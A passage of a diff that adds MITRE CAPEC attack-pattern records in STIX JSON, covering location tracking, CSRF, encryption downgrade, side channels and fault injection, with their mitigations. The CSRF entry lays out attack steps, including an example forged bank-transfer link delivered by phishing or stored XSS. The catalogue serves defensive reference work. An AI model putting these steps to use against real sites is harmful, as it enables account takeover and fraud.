By triggering the cellular broadcast message and then listening for the presence or absence of that message, an attacker could verify that the target is in (or not in) a given location.", + "external_references": [ + { + "external_id": "CAPEC-618", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/618.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "description": "Denis Foo Kune, John Koelndorfer, Nicholas Hopper, Yongdae Kim, Location Leaks on the GSM Air Interface, University of Minnesota", + "external_id": "REF-487", + "source_name": "reference_from_CAPEC", + "url": "https://www-users.cs.umn.edu/~hoppernj/celluloc.pdf" + } + ], + "id": "attack-pattern--3b775ca7-4c1d-4078-bc7b-29907b9596f7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Broadcast Message Request", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_consequences": { + "Other": [ + "Other (An attacker could verify that the target is in (or not in) a given location.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "The attacker must have knowledge of the target’s mobile phone number." + ], + "x_capec_skills_required": { + "Low": "Open source and commercial tools are available for this attack." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changing of mobile number.", + "id": "course-of-action--272a376e-ec84-4fcd-abb5-00cba0e3c7e0", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-618-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--79aff368-471d-46f4-803b-6584f3497601", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--272a376e-ec84-4fcd-abb5-00cba0e3c7e0", + "spec_version": "2.1", + "target_ref": "attack-pattern--3b775ca7-4c1d-4078-bc7b-29907b9596f7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively monitors the signal strength of the target’s cellular RF signal or WiFi RF signal and uses the strength of the signal (with directional antennas and/or from multiple listening points at once) to identify the source location of the signal. 
Obtaining the signal of the target can be accomplished through multiple techniques such as through Cellular Broadcast Message Request or through the use of IMSI Tracking or WiFi MAC Address Tracking.", + "external_references": [ + { + "external_id": "CAPEC-619", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/619.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--d900a0ea-7dd6-4ed8-a1bf-ac498e68d9e5", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Signal Strength Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_skills_required": { + "Low": "Commercial tools are available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. 
In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.", + "external_references": [ + { + "external_id": "CAPEC-62", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/62.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1275", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1275.html" + }, + { + "description": "Cross-Site Request Forgery", + "external_id": "09", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Request-Forgery" + }, + { + "description": "Cross Site Request Forgery (CSRF)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/csrf" + }, + { + "description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH", + "external_id": "REF-62", + "source_name": "reference_from_CAPEC", + "url": "https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-602", + "source_name": "reference_from_CAPEC", + "url": 
"https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html" + } + ], + "id": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Cross Site Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Session Riding" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.\n The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.\n The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore target website: The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.

  2. Techniques
    Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server
    Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server
    View HTML source of web pages that contain links or buttons that perform actions of interest.

Experiment

  1. Create a link that when clicked on, will execute the interesting functionality.: The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.

  2. Techniques
    Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)
    Create a form that will submit a POST request (e.g.

Exploit

  1. Convince user to click on link: Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.

  2. Techniques
    Execute a phishing attack and send the user an e-mail convincing them to click on a link.
    Execute a stored XSS attack on a website to permanently embed the malicious link into the website.
    Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.
    Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4" + ], + "x_capec_resources_required": [ + "All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. 
The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with.", + "id": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "spec_version": "2.1", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.", + "id": "course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e4e7c46-5802-4623-bfb2-726d5643649a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3", + "spec_version": "2.1", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions.", + "id": "course-of-action--d48ac0ea-9821-4d1d-b819-78cf36562e97", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5334f93e-090e-4dc7-9634-9cf8d617820f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d48ac0ea-9821-4d1d-b819-78cf36562e97", + "spec_version": "2.1", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context.", + "id": 
"course-of-action--77756b2a-ad30-4992-acdb-13c8dae467d8", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e911413e-496d-4b6e-afff-88e8e3302abb", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--77756b2a-ad30-4992-acdb-13c8dae467d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker forces the encryption level to be lowered, thus enabling a successful attack against the encrypted data.", + "external_references": [ + { + "external_id": "CAPEC-620", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/620.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + }, + { + "description": "Weaken Encryption", + "external_id": "T1600", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1600" + } + ], + "id": "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Drop Encryption Level", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + 
"x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).", + "external_references": [ + { + "external_id": "CAPEC-621", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/621.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Analysis of Packet Timing and Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes." 
+ ], + "x_capec_skills_required": { + "High": "These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Distort packet sizes and timing at VPN layer by adding padding to normalize packet sizes and timing delays to reduce information leakage via timing.", + "id": "course-of-action--3d82800d-a207-4cf5-8acb-34298fed624c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-621-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce899b44-526f-4892-80d2-510f96e94715", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3d82800d-a207-4cf5-8acb-34298fed624c", + "spec_version": "2.1", + "target_ref": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). 
This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.", + "external_references": [ + { + "external_id": "CAPEC-622", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/622.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Electromagnetic Side-Channel Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data. For mobile devices, depending on which keys are compromised, the attacker may be able to decrypt VOIP communications, impersonate the targeted caller, or access the enterprise VPN server.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Proximal access to the device." + ], + "x_capec_skills_required": { + "Medium": "Sophisticated attack, but detailed techniques published in the open literature." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize side-channel resistant implementations of all crypto algorithms.", + "id": "course-of-action--2e9301ad-e907-414c-9bac-0be1517b0112", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--518cf128-c5dd-41bf-920c-c59464ae3e89", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e9301ad-e907-414c-9bac-0be1517b0112", + "spec_version": "2.1", + "target_ref": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of all devices that contain secret key information. 
(even when devices are not in use)", + "id": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef792ac3-e23f-463b-8456-e2cb9549a020", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "spec_version": "2.1", + "target_ref": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. 
Capturing these emissions can help an adversary understand what the device is doing.", + "external_references": [ + { + "external_id": "CAPEC-623", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/623.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--3d5bbdf7-b642-43b4-b4be-d9f35923380d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Compromising Emanations Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Capture vibrations/emissions from the handset or retransmission device display screen to recreat display information from a distance.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Proximal access to the device." + ], + "x_capec_skills_required": { + "High": "Sophisticated attack." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "None are known.", + "id": "course-of-action--1f959357-f511-4f0e-9b12-51ee99284c2f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-623-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2ad7be7d-7b09-4472-bc30-41894c39f568", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f959357-f511-4f0e-9b12-51ee99284c2f", + "spec_version": "2.1", + "target_ref": "attack-pattern--3d5bbdf7-b642-43b4-b4be-d9f35923380d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary uses disruptive signals or events, or alters the physical environment a device operates in, to cause faulty behavior in electronic devices. This can include electromagnetic pulses, laser pulses, clock glitches, ambient temperature extremes, and more. 
When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information.", + "external_references": [ + { + "external_id": "CAPEC-624", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/624.html" + }, + { + "external_id": "CWE-1247", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1247.html" + }, + { + "external_id": "CWE-1248", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1248.html" + }, + { + "external_id": "CWE-1256", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1256.html" + }, + { + "external_id": "CWE-1319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1319.html" + }, + { + "external_id": "CWE-1332", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1332.html" + }, + { + "external_id": "CWE-1334", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1334.html" + }, + { + "external_id": "CWE-1338", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1338.html" + }, + { + "external_id": "CWE-1351", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1351.html" + } + ], + "id": "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Fault Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Side-Channel Attack" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)", + "Bypass Protection Mechanism (An adversary capable of successfully 
collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)", + "Hide Activities (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (If an adversary is able to inject data via a fault or side channel vulnerability towards malicious ends, the integrity of the application or information system will be compromised.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255" + ], + "x_capec_prerequisites": [ + "Physical access to the system", + "The adversary must be cognizant of where fault injection vulnerabilities exist in the system in order to leverage them for exploitation." + ], + "x_capec_resources_required": [ + "\n The relevant sensors and tools to detect and analyze fault/side-channel data from a system.\n A tool capable of injecting fault/side-channel data into a system or application.\n " + ], + "x_capec_skills_required": { + "High": "Adversaries require non-trivial technical skills to create and implement fault injection attacks. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement robust physical security countermeasures and monitoring.", + "id": "course-of-action--f6d53020-4245-4f4d-848b-e5ddf8d7db8e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-624-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--92d3b28d-cca3-4d44-82ca-d1fce4083918", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f6d53020-4245-4f4d-848b-e5ddf8d7db8e", + "spec_version": "2.1", + "target_ref": "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Fault injection attacks against mobile devices use disruptive signals or events (e.g. electromagnetic pulses, 